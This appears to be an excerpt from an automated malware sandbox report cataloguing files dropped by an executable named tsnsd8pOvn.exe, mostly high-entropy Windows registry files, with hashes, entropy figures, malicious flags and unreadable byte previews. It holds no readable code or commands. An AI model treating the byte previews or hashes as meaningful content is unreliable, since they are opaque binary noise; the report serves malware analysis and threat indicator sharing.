                              Preview:regf.-."..b..."..S..@W..@....u.$.i,.C.]..?.#.OS....h...^#.I.Np....aM.lW.j..ds...Y(..S(....A.....T.4..GT.?..G.h4b...6t.Q...i.....Eo.........k.@..9..../....`.*....^Gv!...E~;.._...bYUB....Y.c.Z....,..f}.{.Z..Z:S.b{.T.....v.i...._...s.. .*v.E.eN..P..C.....Ft.i...vZ..pw..|N8...1.}..dT.... ..6..W.;/F3...Z:..!.D..:cs2....Y0b<.33......\.[`.#..Uh)c...'.+...&.F.0...h..."p.9......d>...^.Cu1...d0...Y...p..D2....\...!A ..kF.n..4$.........5.'..5&L .T....J.C.J.W.J...^.!..#.3......k..W..2.].....(..e(.Q<U..`.9...ZQ.f.......Q.a.9..Q..h....v..}...7]8...n....G.h....).AF!.9p./7.P.6..1....C..V.........1..>....w.=3..x.-Bz...%./...hR.=...w.../S.M...Qlw.'.e.'.]...n...k.nF.0r.=.].fI.E..<.8...1...k).o=......$o.fd.I..<..._w..dT:.K....a.,.?^&.....a'....7#.H.b.s..b...E...)..O.F.^.}.n.^.9_..R..6.]b.);.S...-......F"..P..v.+vB..+$.....\....ouh`.yb.W.j.....P..*"%2.f?T-.b..6..........Os.o....d|..t.......2...."....p..._.h..1.w..Y.q.8.U.m.-y.P....m.......\..v2....j.........A
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:DOS executable (COM)
                              Category:dropped
                              Size (bytes):36540
                              Entropy (8bit):7.994861522915828
                              Encrypted:true
                              SSDEEP:768:gyyyp5LgwXET5ODWk6R6Mt7EBum+InpKa7Q4zCvx/EX98Y7TB6D:XPrMT5ODWk6R/t7E0opKaxzCdEt8
                              MD5:7C6D657AE8EB5F1A3B91CAA2A5BB97B6
                              SHA1:67C4D84AF41AAA4147372F0024E52A82FB126CCB
                              SHA-256:0ABBE2E31AAA975F9BA58115EAE3660F0BE6EFB6D1870CE2111E129D4B048A66
                              SHA-512:C1F2B4F35D5753D0DF07BDA09DFDBC520727D96E116079E2EF44118ADCB859B5950965C7B441C5A967BC53348BCF807E1F8FB428912FE79D97762F37D94EB38C
                              Malicious:true
                              Preview:.u.......Eya.x.l.=.U.g..c...Z4.N8.F..~.uEQ.p:.D.x.*M....C@u.PK...C..cW..f.'..y$+..x..;.a..... ........uR..$.......p.vA..X.A.........cy.}j2..O..`C..>...Fe.~$h..s6.........~..:...../..j.1...%d..Z.`.w.os....K...X...=Q.p.$\%5..1.eF.n.w..X....%........|..1.}..j...}.S.n.,{[.3~.....FTa.~...A..OhL.C...($.s.^.W..Le...SA1..6\.....=...(xQ.D......A....B0...D.th...{.v%n40..'....f..|B.....#......_>.....>...K....3.a.S!JyNV.....q..-....._.2........l..p.f.z"...L4.$.....kR..r.{..v..0...Obm...t..*...:....o..E.u._..$XE.'..k7j...B.....:.....u/$%..C...Jt-..lg....N..#&m.....x..._...P..'cF....TU6..../..8....o.X.1..E...e.c.TY,\..l3X.J}..5.x.t..]5.RIn.I(%.s..E..yk.Eu....o[..*..*....Q.Q..A.t..k,.%.Is*.8I..r@..R.)~..h0~.....~1V..78X....W..=...<.^..[.V..v3.y..$...W.}p-.M.P....0..C=.J7...e=.l{.M.z.....X.>.?.[..?p.B....~[!....T...7eT...du .. W....y5.D..,l....o....y.A...Y..h.jco.(..4.b]..C._...B.w..X./.d.}....e:.Nv.....|....9.f-qp.&.e@a4o.P,V;......?....e.F\]5....E.....=.ILN..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.974539955116368
                              Encrypted:false
                              SSDEEP:192:SklY3n9CnVGafj/v+reLnaD5VWUCkk5DdrWc7NdWMf:o3nMVGcHCenaDaUCR5Zyq9
                              MD5:3386B5F37A8D83274F3EDAACF48ADCE4
                              SHA1:89766D0580EC4B11E92B1CC511981A268F549D58
                              SHA-256:DA18D1133B58BDCCF816CC187CC3355686E2509659A9CEA65997ECB262A1D6F0
                              SHA-512:212B132CDBC809ADBB0B322F7C2B443F38DC36F0B14B8EDE0DD7A8206EAED11A6509BC3FE3FDCFF85FFDF0A9736851646DF5596CEC5DFA84A10612730FEBFF56
                              Malicious:false
                              Preview:regf....>...4.).x.r... .|....<.C..dQg6...Y....M.......}...e..-^x!.. !..|ju=@..j.=Ls....Ci[-..&<.bZ.^......vI...u+...t...{..)/...a[W....y.......[\Y.o.Ao..?.....g?.....G./...BG..v.....W.%..}[,...v .U....;5.$.(..+......X......`..4.n.S..Y...t........]..>..U-.@'U..&..(!.JzEB......G.#.>.!.x.<.....g.~.........1._.&.....q`..[.h{6.:..W........<....a5R...l..V.z..o..=P...q......x.T.c.........Eo].P5;.kX...C.9y...N.F............j...d...T<g..1.n&...d.....`. ...k^9Ln.......o....f...wA..C...w1k..)_.DQ.....k...j...J.]%sWs.R...T..j...+..{......Ru.....Y|y..s..a..kb.-m.L.....Yo.....n.=w/.-G...A...>d.K.]...*<....DG..7.z............k<Es.p..9...d.H..K....QX..as....P...).$......%}...Z...E}..#.IEazx...%....{...r.];..:v.l4....-...w*u...|.?....j`A..q6...b:4Q!.6.S..t...Q.y...o...c.....-R.X.Aw.e._.....j.7.....8c...g.vD.(:...?j}.FD.....h.......W.`..h..=..1.&.........>.m...G....G.B.~..+.\.k...AxU.E.?+..VH.l`U.Y~.b..s..w...D9<.......x..*"Bl.v...{......7.I....qc.K....`
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.974718224280075
                              Encrypted:false
                              SSDEEP:192:21jRs/+q94xBihUL1I6HuWm1leTjlZKO2ULOzVKL48zP/tQTbZf:21jREj94xBLa1led8OQzVKvz/ubB
                              MD5:43740CA2D7E4E6C3FA796E39DA6A50A8
                              SHA1:16717CBA15F5A34F60C4F76F5F89E614B2231C69
                              SHA-256:1576E19E61C45AF5158607D50BFA57F67F1676F92061581EA651E2BF98289B56
                              SHA-512:73EC0FE472B822F5004CD52674C79CD7CCD5F370FAC17DF78B5F6AA0C56DA810678412D7581237DEB1E9C29DB6E3D9E9DF1E237DC4FC3E1D5515794A183D4DE5
                              Malicious:false
                              Preview:regf.p.r.{........w...V......]..U.......-...Z..>.zXm...V~,.i}....R7...,.S.c....o.2.c...$F\0e:.}I..L...y....hrS.k..f.........L.$.u.)B8a...?O..{i...D........k...n.m.xw..........5y.....y.......s.E;....2....Z^..A.ao...\.V.y.'.[2.....U..$...l./...Aa......z......8..Z.kzE.a.2....=.. .x.c.....A.Ck..@R.m..%....y..p.X.....P.......L.S3..?......>{F.....k|6......W."V......Mi..0[..b....cozj....'*..h../.........$.O.e.0@.<.Y.....w).1D...../+k,.@R]F"h.J.P.a......;..%C.'c."s.<.P.i1K..S9.#lB......9.....m+i.s@. .)QC.K......3m....l..%.F.Ff...S[@.'<..a......Qu..d.B...!........[......WaS..(.._....e..g.[.`./.w..........w(.Fz....i..oA.=.k......`j..W...............Yb.1..EM%?.....?l.'.p...L..I\s)T. ...4tik..._.]Y...>.o.."...].+n=OsK.v.+S7..u.....'.TB..(U7..."....E....j.T.^S..3.48.^H..g.....:w<.zQE.QU.....M...o...i.R8.sT.6...ha.D2......=;Mwl.....B....u.(...-..[..(..C..P:.4...o.u......E..<.K..o..q..Dh..|<:.7x...tQ...hGp......."..R......q..D.I..A]..N.'0...'.b......
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):16718
                              Entropy (8bit):7.987634153033241
                              Encrypted:false
                              SSDEEP:384:mQHkyD/QVs5FFim60geQUYc+3D0KB0R56M3n:JZDI257im6zeQRA7Vn
                              MD5:C928E52EA169F90881966C8D445B6D0C
                              SHA1:ED506379C8E78A36C71C6A8FC94B47D3DC513310
                              SHA-256:BD8AB9B2BE63F53E99D07BD3DAC37543149F79822FB6C1CC45AA2B924BA9CF9A
                              SHA-512:181EBD9B2BDFE9EAA886235ACCC7F2EFEE843830EA9265729C2786C74DDE2ED7D7E56258F3A0D8C38039FB1A53F17387DABBBDB055D04F27DE089DD17F88B6D3
                              Malicious:true
                              Preview:regf.v5I.'PB4c......f..y...E.I.av.W......$.z...{.3\...........&%!uab..S.......3.r$.n.z.a.1.e..7...E...<a!9.%/^.]..#....w.Y!.vw,...X._..w...a%=Q.R.T6.;.....W.D...j....z\..G...bt....O.Dfg..A.q9....<J....J......@.$.!....7.$..7.)#N.Z'..l.p..,5#Z0rj.9..If.t...o.@0.....f..]k....vl...a.tvdv...=(.e..w!nZ4..s0.A0..8.x4C.Y.Y........9....?O_..L*.".VP...O.>iwq...63..PM{-.+....!.\..0B!..'N..(..x..c.&...O4\.xMH...z.....\z....T......x....c#..V.{...I..8/...."... ....3.D..-`....q..Z.......,.. ...d.).68.3.D<.......l....ba. 5..........h.=...A!.....B<.}...9r..AEG.m.1.|&......Y......E...0..5.Z.,w...3P....../TR....>.u/.q.$.....N..M.m.o.N.9U3.).........L7..x.8.o.....a..............2Q.X.%...%...=..S.R.....Ux.BR....#.{.0-I.R(...W..N.Z..&y....v..!....|lz.S.X..:..b....e2...DT.....F.4..T.#2@....E:...i..<`..@...bh.b.+.eB.,.A<..(3<.Jc.Y.JAo5.....y.X...*.H.~.....iq0..!....7.....H>...C.`G..r..6.i.IV.)}m.u`.~9.@..A..#jpg...{.;..F.L.}.."..,.....S.f..!$=.=H..e..}...+.G
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):16718
                              Entropy (8bit):7.9870587070299965
                              Encrypted:false
                              SSDEEP:384:JItTF4m2NhNlj+VKUh4Ci4jJEa8w5iiZpCWfBg54YPfbssGO:JIkjjLqV1diwJEbfiZ9/Ts5
                              MD5:82A4C538B9B6F04B0EE6069B33EA8AD3
                              SHA1:6C35CA06101CC8E99AC6B82AD5C0DB6588C64E1F
                              SHA-256:1F22958C34F70A42515FFECB8BCFEF3AF2937F7F6D9EDC45EC299CB73347FE83
                              SHA-512:964C632F2052B996FA0230C5468F9FEDCBDA20600DC3AE7532528D83E3B5B1A8C43990EAFC2EFB3346B0436030C0F4FF7E9B8B3A55BA53C119716412932EB309
                              Malicious:false
                              Preview:regf.{.@).M.$......JUp}(..K..S.z6..G.G.....A..Z<. ...~.X.*.'.rO.@q.....]...n..@yc. .b.j.)cpo!.2%.x.d..;..&..N.m$.:l.....-ow...B.[rr7.{-.....e..ut.$.M.jJ.h. bl5.......C......3.....&....R..n .G.`.r.^N...u.$.....|.....T........eqa.v'.r..."..QI%Pa...Q&LX.f...G.G....`..v.\0..d.....F4,5.N.6....C."B...-..t..?..mf.;.S...-^....."..#.{.F.....r.i.....C.~7.....d.%...T.|..Zo..]b..Y....u.......g....$8.........y..R7b....p..W...I...*.$ni..,...V...".4+.,4..D}.. ..Q..iKR....ee.._.....q@ ..8.....e`......s..e......P..pkg..p.'.xG{.[p..")...n.._}T|.|*....T~..K.K...B#. ...V..Y.....6.......'.h3..m..q..8....m..D$.5..zM.B.../h1.-...I3..C}[.v~}.SV....D..s[.........z.>.Xn....((.g...mL.}.*.um..k.0}...M.....8...h;.|RP8..W..g9..hD..u.x......i....K.y..=..;...I]...t...DM.."^.....]...wO...$.....PKw....tI...]..9.....=.....y....i.;.].<.0.p9..#zh.u.w +.sF..98.......[..3........d7.K...{Y.V..}..$<d..Vt2..e...1..,NJ..-...8.9Z.X..%...~.4..M0.a.E..CMh;...\.:f..t.........}@OU.....
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):33102
                              Entropy (8bit):7.994574726826892
                              Encrypted:true
                              SSDEEP:768:61hrgSPtM5f35LXxVh8RV47rF+7ZOvsgREPs3iuvuRUq/h4pC/HS1rY:YGSq5v5wV47rF2zUEPs3NWUJ0/HSVY
                              MD5:B19A0C8F0FD0845787D3A80B434EFA98
                              SHA1:756429A773A7E728FCDE2A54499DF166E30D0F30
                              SHA-256:3B5709C7B44820A8A405E014229A429DC8DF5FC59EB2DD082E3DC9F6F0568ABE
                              SHA-512:6E67D7B5A75B1C6485BEBBDDEDA13F1CDE529D132A67DF1A512E616CE65E284C8F6B6EEC79AD41078C89D95D419279BE5FC5DC499D366631A77640FB1D29AFAE
                              Malicious:true
                              Preview:regf....WKG....?y.E..^|......g.w._..\...Mka..F-....;.Z.1g.........F.k ..,.n%....l.W.7..%.VP|l_..(.f".E,aCr....9{=>ReM...<..c>8O.z...]u.O..zq..8r..T.9...]....6%.g;...7...n..WN{...w.....N..$...1w....N.......c.j...R.T....>.i.l.....h.p.m..L$..Q......=....1Je...X.......*9p.a3h+.m.....ER.S.Q.O.q.......g.....+....;~.G...b...w..[1..1....{.59p.C.#.;Y.$V.g.......5..&.L..j...m........cR...K..qE._......H......%..+@c.I..u!..K[t..)X._..R....../.p..l.......m.B..9@@%..!a..&L.......I,..abbT-.d9..ry....X..~..#2..}...[i..Hhr..C;F...3..ucj.*.p..z..&`../.1.k.....*.n.P..@.$.e"8._.x]%...n....~..g....I_.!.ah...S..........R.^a.....#c..<)1.z9.cV......+..z.8co%..K..6.b"{.`D...8L......."..g...(%h.8..R....%zm)...nXj.."1.....h...[.f>.....O.0!n..........T.....l.'.l..s....p...I.?.7.... }]&&..;...C.2..2....&.v...SJ....wo?T.e......-/&D.4..E.x.b..d..R.w?K.Hz)..^..".[d!.....S.vR..KQ..~...........X=#i^.2d............._..V...............x..P.&.>e.._........#._jh.)Z.....
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):45110
                              Entropy (8bit):7.99591413099336
                              Encrypted:true
                              SSDEEP:768:kCiA71vxlqsFFTKqZJNSty5OWr+KHzIZ2KkVuZwI7qRHm0TgIM4LxzSsdtTFs9AC:kCR7JqQTtZJ8tjWrRY2lMeaqo0c4F6AC
                              MD5:386EB926CAEC724A995137B8F728FCE2
                              SHA1:8E147E4DDA88D6CCC4C813BD9E6FD5E385DBC196
                              SHA-256:E75E54B2ACCCF82343506C03C5E69AF3EDF218C535F03E7628C69273C40CC52A
                              SHA-512:BCED10A38FB98E2EC4A54C8291653D8E5D18E14393DD4F475B654F43B09CDDDC0D26AA07C63227372553CD9E8BF330565500EFD5AAE3F4824DEEE8F5D6C0C66A
                              Malicious:true
                              Preview:G.o2|.v.d.....7...%.97z.Rf..gl-Q^F.|t..M....\Z.......R>.Z..........g\.D8.*.:...\..X..#1.r#.^#.P..mW.g...'.>7......!1....n...N..2.J..r7..9.^......[..%T..6`.}.P.g...6J...uY!.D."GE..OQ.tU..DU...v..i.f....3#Y...Y.\...h..D.6..h.......Q.m..f@..P)g.z(.6)?........./P.1n4..3.P.K..J........6.RH.z.... .2.'.a9O..Z.?=s......?..x.Z.g?....U.....Z$......%...9...s/~N.b1....ms.7.O.CSN..Dr...i.d....\S/.eJ...K..m.v.....4..5.`..!.e....3W........i.....dhl..Q.0...N.1H..<......#..g.. ...m.>...{._:8......."m(H@.,.$.3..S-..6...w..+i... ...u....[..=.N..7u..F......>...4...?..Cd.....W.h-#.A..Hm..M..I.......Ue\.. ..<:.....+....+.$Y1.h.........t+o.....5m...h.q.6.......H...{.p..L..c..#.!...q.sF..x,.;...aJo...N9.qE.vB......N...>..3..+>..F....e.!....o.w"[..q....I...p...e.......Br......Kk....4E.oC@W.v...7N..n......>.8F-.........8z.....35.{i..._.....&7YZ.}......EF.:...@c...E2.,..t$/. ym.......[.2..!vuu1.........R.P!.].F...P.#...:A....@W..j....f&.h...........Y..Q*s
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.978319341830583
                              Encrypted:false
                              SSDEEP:192:W97aKRKcsdB52WIv/ll+Ln31dON4h8b+3x+cIF9qmqXipiDlrRSqiBe6f:2mvHh0/GrXyb+9ftXEildyZ
                              MD5:62745C721565379642EC593F5DA1EE10
                              SHA1:7831BED39055872D8F16DE1139AC93829D7A7FF4
                              SHA-256:18F4405CDBCAFABBAE65E07B9A7314317B49F3AD4794B070EC95BFAF4A83833E
                              SHA-512:7F055DAA04CD9D989C1F8077C96A1657CF13D62DF8A63B67BDD5FDE1CB824BDACCEE0436F8F39B0FE24F736FB457C053684F0BB9050C80B128316C2330D5D37A
                              Malicious:false
                              Preview:regf..T...m...;...A..p...,_.,Y...2...7.)^.".ku{.jg'.%'9.....6c.....RN.Q|..W..4.......X....^h.......5.."M......^..y.^J...P..i.~....2a........7..z`{.&.Z..j.m..v..W.....=b.Ji1=..r.M.:t-K....Im.e..m.....|.d.ap8.....Pk.....Tz....`#<M.-.Ii<X!..{...MS....6....K..\...../.>.K..p...pD+ .3..~.r.$...AnN....h%....+.._f......l.)r..=?....AH...{\.B....vVZ...vh\.|......b...%m|..^08zT^.Da.......H.>,W.W2....zZ.e.a.w..*Z._)...h.H...M...bO.E...~aEr.,.....>3....,..$...I.+_..).u.u...?............$.?.+j..c.Y...{.H.=W.#>.}T.....].nn3.n..t...Wp^H..e;.s.bkQ0.jI.?y..'......O....z.'...A.]w..Q...c....Wv..K|L|@f..*.o....~.vA5.B..;.......b....vy...{.)....\R..K..s.N.....Qm.>j.;..K....../...=..... #..t=.~?`.....$/e.gRw....0oxjZ"..3..i5.jKe.t ..o.-?w.W..........%..]...!`...8V]..*..[e.('.s...D..D.c.........;..3.9<...\...b..qU......"...!F( .n.."........W.?.\..Q..$.y.....Jz...."..0m(}..c.6...33.7g...J..&&.f..Iu...\..W..q.(.bY..5.7~S..,}...o....xp..M:kxe}KD....o.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.975309293941875
                              Encrypted:false
                              SSDEEP:192:ox7eMpOg8EU95Z34Ai72Uugbl+aPcSeIMVf:u7D7fi5O6UPTPcS32
                              MD5:3ACF665B1A2BF5DC66198C237B40905A
                              SHA1:449EA8FB210494A9EA144B1D4F5FAAE3B3CEB2E9
                              SHA-256:71BB3911EB9EE9CE259238C9C32DBA17F840B06FA7AE699AFFFA83DF3F779C42
                              SHA-512:A741A945E05B329C2EDA38C6ED9E0AC273ACE8988D27C3C70CBE9C03D7485A806B1C3FC72D81765C89C221A089830FD79752739B01BE0BE0C74CBDD828359F4B
                              Malicious:false
                              Preview:regf.rK.sO4.B...f.p......Ip.e'X.vv.U.....p......x......T.hqizq..$.#;[..4...,..!.y..1 ....k.luJ..@.......U.`....w...)....q.y^.Re....T.....,I..7d.Eg53...>..!;b....`.'%WB.?...k..F....6...!....O.*u.(.G..{......Y...'.......>y.h4.k....I.[otY...&F.A.C.mrQ..v.f.y...\....*..ns..D.u.:......Zl...........Y..$..`.9...B/.*.S^.....2......./.2..%...U..:a.......F`H...%8t*;.....K..g......5.I.[..67UT.$.x......>.n..).....t...O.E...+..+h..."....Q>.4y'e..Eo...|..N.&..$..:i.qhF8..l...cx4.xD9-BD..#|.A"^...bF.\..^-2;/n.G.b>.....B.|.q..:. .rt(M.......lv.j4.S...F...sm}..b>A..\w.]j..z9....*3(.5Z...w..6L....v"....M.1d...j&.N.\Jl.Wg..&g f[.r.....aO....E....%q..Zex..<&rQ........2.FT.h..^.RSg....mQO...."...)}...R>..q..i.L.s7...u.."]..'0.1..H..D........K.......3u`.8+....dWf...V....L.....-^*....S....xe6]...M....h.....'...5%6.5...@......V.[.D. .d...;..H..=....l1....q.|.<.R|..`7v....M`.G.v...M.......k.B...U2......A.DJ......u.Hr....h.(O.E...s3.D..m@$.'..,...r.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.978454568684321
                              Encrypted:false
                              SSDEEP:192:sJzR1KQ6TjET2QZul8nA/vFRr49QFPjkG8/Pyavf:O6k2QZul8OtF49sPjR8/PF
                              MD5:420B6E9C61043E9527277167E8FBDCC6
                              SHA1:C5B488F60334FBD70F139AD387EABA71309E635B
                              SHA-256:99AD6639D2CD1BC5C5567C39D74CDFC446FFD9C2ABDB7B003A81E01887473888
                              SHA-512:419B441C90B2A0C8F803139A4FCBC3C1802777B3C110C40A9024DDA3EC6FDD5C83679A782E4C43CAA5C204E1F7DC9F55E67AC564030A34BA1446ED8F614207B8
                              Malicious:false
                              Preview:regf...h.e..r6..,..+.....u.].l-.?...w.T.......ZWY..d=W.~.......... \..9.....[bH.suc.....1.......m...(..y.ad.D..,z...`...z.[..s...`..v.z......D..f..U.......4..K..z.:..[A.N!..j.....w.5.Z.,!..1.........}....5.9.&.0:K.]..0MpT=8...]V3x.2:.&..O.sO .,....Q.\O.m%.U..J.....]W....NB:..w...<.../..@..^E..B.Q.C.Q.o.N.>..^?.K.,..C....i.a.".nU...UZp.;.q.D....-.F..&.*..!..).s......:\....s... H.R..8....I...M.h...g..,H..5'a.^Z.tL..$jd....W~ ...]O[=...p/..w..$)5./.U..).]|.7..a7..I1P..Ie.3"..............yYr..5.c.(..=E.1l._"R.;.......M..[gO.$........_Q....Y...../&..C.*.Z{e.. ..y..t....l.9...{?...@*......2.W3+..C(...`.M..8.....j..&.Im..m.i.b..8.. R.D.G....p.=._..m...S.(.....\.........2QE..1.t...n7s7v"..Mk....)..[...~5(.1Y.\W..9x...e..(.3'.|.Z..Z.......l...!.....\...8. ...#0.V.P9c!..C.s..4.7..:.b..b...{......za....c../.3..=...=.G2.....fv_(A..T%.zUR.P)b.(}.?....".@X...Z..<q.Fy....t.+.W.xI.....X...vN}.E_w.6......^.0F..M...[..~..zN.ca.......F.#.e...).......Y...tc......
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.976405387822575
                              Encrypted:false
                              SSDEEP:192:x34iKFClskf+Sh83YjEBNBoSOAs3xCpKIyqYsHH/V3woQLG2f:lZmkf+LIY78xBhMmoQCA
                              MD5:A55C518ED5B24CF03B2AE0B6950C996A
                              SHA1:972518DDF27ADAF9A0AECA79506CE507A28674A8
                              SHA-256:E94A81B300459A9C4F5938435DC013701EDE9BC523D96CFB8A90FA01E728F8BF
                              SHA-512:3737007EC8621B73158766F9BE48B2BA5D7194FF4C65359FB8E2B09DE202F69B2574BA6143BA31FF20B80F2111E307C877E8CA85400E8B4AC36161AF4C3435B9
                              Malicious:false
                              Preview:regf...K..m.A\nr..A..uE....u.I.]k&o....z.W..............K2sl.....GoC.........V.$..4.>..V...V.QIT...Sn)...9^.m^U.=U..D.sT..8....B!.._.y..(.......G.....k..zb..........o.y.k.r.C.>..d...b.r.Dc..U.......k.{<..|.r..S..di..wSG.)3...Q.M@Yr.K.6..5....|FF...W.YmI.;x..*..-.ft.~..#.:......zgT.A^.,.....5.>-.."a)y.2.W.L.+.~..(..us..l.\./.....<..+....*9..\).........r...^."..H..... ....C....<.Bj...jN..L.9.>.h....n.....`.... &v......Q.w...2U.y........(..~H^...UfR4.>:.c*....6`2.w....tE...H..eX.J..E.P@O9...P..t".PY...y....5:..3`d...}c.......-.D...|i..'.ZZ.t.V.w..o.h...4..r`O>..Oi..c..?.K..2.}V..v......yF.s.:_..........?...Y.>e....d.k.>R....1[FX..C...^.*...L....XD....E...#...e.(.dp...q.P.v..........v9ri.G.3...*svS........L...~QF5D.E...N.4.p$..<|.k......Cc."xX.0p.Be/..ra...:.|*..;.w.sH(..J/.#..U.......fB.p..&... ........#...2...U..V..8........b.f~.....q].]..y?9.nt.v.V.......(|..PC...=M....n.!...u....x_,4z...).`....r..#..F..{T... Xw....K=J.<.....Fk7{........oP..._..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.979872392213141
                              Encrypted:false
                              SSDEEP:192:JQm6YVYBpB8ju4wJ112hlgE1R98qsDUWyqM/XEgA07f:JQ3YVYXrLehlzRIlM/v
                              MD5:D1F8F53188942E3B8CF42CDEAA5D9A68
                              SHA1:2AFB435CE88F16CBBFE038D8228F8B87703F55E0
                              SHA-256:C6715CA302533297D93A6220A457E248FFF70E88BB044C21E5871FE463BDDD19
                              SHA-512:344A48C384722100ECCD1AEDB3679C008D2E2BED5A1058A165FA06679C4FF14D499F5DEC1D5785BC70503ED46FE4E779224D3440E451642C1336CB30A2DCA87F
                              Malicious:false
                              Preview:regf.2...:.-...I.3tx.h........wgNh..Q.fi_VF.I.x..I..@....4...*.C......l......Ab..'../.../..v....-?c.....L.p3..*.p.[.zu...C.-L7...w......t..Yb2W..........+.A.8..<....Oi..MD..P.d.*..K."U..d...>..Z|.;-.a.*....!/Ii.......u.....@.g.U...y...V..p.~.A...s.eT...5sB..w..)...<.T......I..O....e..J....%.....t.$-...i.p.\..&.W....v,6.P8]..!....`.T.O.UN...d./+H.G........).=CO.&.X.......#,.$..W..?.$Y...Hd....`p(.Y....k..../8.&.-..M........y./.*..N...W...J.z..[.#...c6.Mn.....,..J<N.....E..Kg...#.X.\...v...r..i.#+..]...dU...X...FD..-%.!........H.....4...g..cn.9i<>.iz......"4.......+M4...v..!)....Rh..m.].d._......heOI.Q..8...h....{f+..G..zm.D<.3.kCK./..;.,...Df5..+m...{$.....(...l..t...tY.0...O.{ .GG.h.v..[{h....3Q.pv.3..H......G..u=.......u..e..p...|...4.<k.~....h"*.{...mv.>f%...]-%.....KG...~e.o..,{CU..".....j..........Q_..6.M.L.4..W..D.,:....._.\D......Y.39.+Mn..G..m....8.:M.9........8...up..t.e..(..k..%....k`..i.?...&....6s. ..U.!8....._...k>.p..-.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.981159604364473
                              Encrypted:false
                              SSDEEP:192:O99TcvKPslihXowMVkrzxjKmeq5m59GtcDZIFpWeH2oTPF4QZf:q3tmwMVyzwmlm59GtcDZ6BHZTPmQB
                              MD5:C448DF063CED44657D5E675BE0E720DF
                              SHA1:9445E0EBE2C41248E8960E1BE1625F3856ABB1A8
                              SHA-256:E9CAF95C22319CFDBFC436248952969567F43F2EF3D50C06CAB5B569374C7AC9
                              SHA-512:F2BF6BCCDB4E6182CF624F9A334A9B2663A4B79608FDE2775214C1C79B5DA96B72CA1A87D386B9DEB372EF5600466F2C9BEFAF57F8352ACFD2E5DA31BA12420C
                              Malicious:false
                              Preview:regf./..k2k...l {....Xf.{.,&..d..b...d.])%BH#..3Kag.A...#.M...V..Od.3.v........*..f.W.......... '..vS..V..G...|...X.AQ.>W...No~...8_......bf...?./.z.Fl.....g..f..M~..o,.s'.V..g#.x...:G.}..~.#9.Gv.%.8.~...K.0.Z.T.b...$..5k.../.....;z.q6..F.8.....ah.nLJ`+....D..ac.........Q.Nf.-.?....A...KX..bl$.'........`mJE........L8........&.gw...-g..Z1\/k.=p;.KK.w@..cw0..e.......h.8Gh6 ..V....PRs.". P.......E...R.1..@.:..n......(.Wg.).=.~....I...k.m..H......Y...y.._e.^....V..._..3.T..~(Q....0.R.I._..Xe.TB{.=Cp,%....oc.V..^h.}.S....$.X.Q{.......}.'.....Q...2..\.t..`A.......'36.....sE.M.+0...%+[?.HG....<[.u..zT..K.{k..7`..C.>cU.3o..E._W..;....v.$.s%....m.,@...}........-..*,.|.....=.jPxn.'.c.....Y.I..p..V....?k[..N..;.X.T.>.WM.....J.T.1...n...:.,...d..U.o.ml\U`.!.AW.....\I;.......O...4.Il9.....4..._..?&F....$}I.&o....Uk...]...y...b..6D..9.V..P.4.h....2..j..r.o..-~..(Z ..{..^..<........N.8_..J.,n.H..bW%...X(...P.s5....f`..ZJ...Y....j..."..[..,...b...F].VB.|X.B...H.n..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.9778727678179555
                              Encrypted:false
                              SSDEEP:192:45mznCevlfHvpO2zippzGhGCfeJbEYwZQf:wuxdSYfmbEVZC
                              MD5:979B1123FACC8D7DC5F0EE18BB4D634C
                              SHA1:4FB9B49D9030CFDFCE3B296F70F9261DCFD56F78
                              SHA-256:681621F9131A52FE951275372C24EC2BA899FC05B1A3D14C506E24F1984C3FBE
                              SHA-512:507972AB379EC515D7F046F97C6EA500A6C74CFC8DD7F886B3D9FCA7D4DC750396C74D363D8BF8E8BF75A27C50B2D720F58BEC004B6E190A620351FC03A35EA1
                              Malicious:false
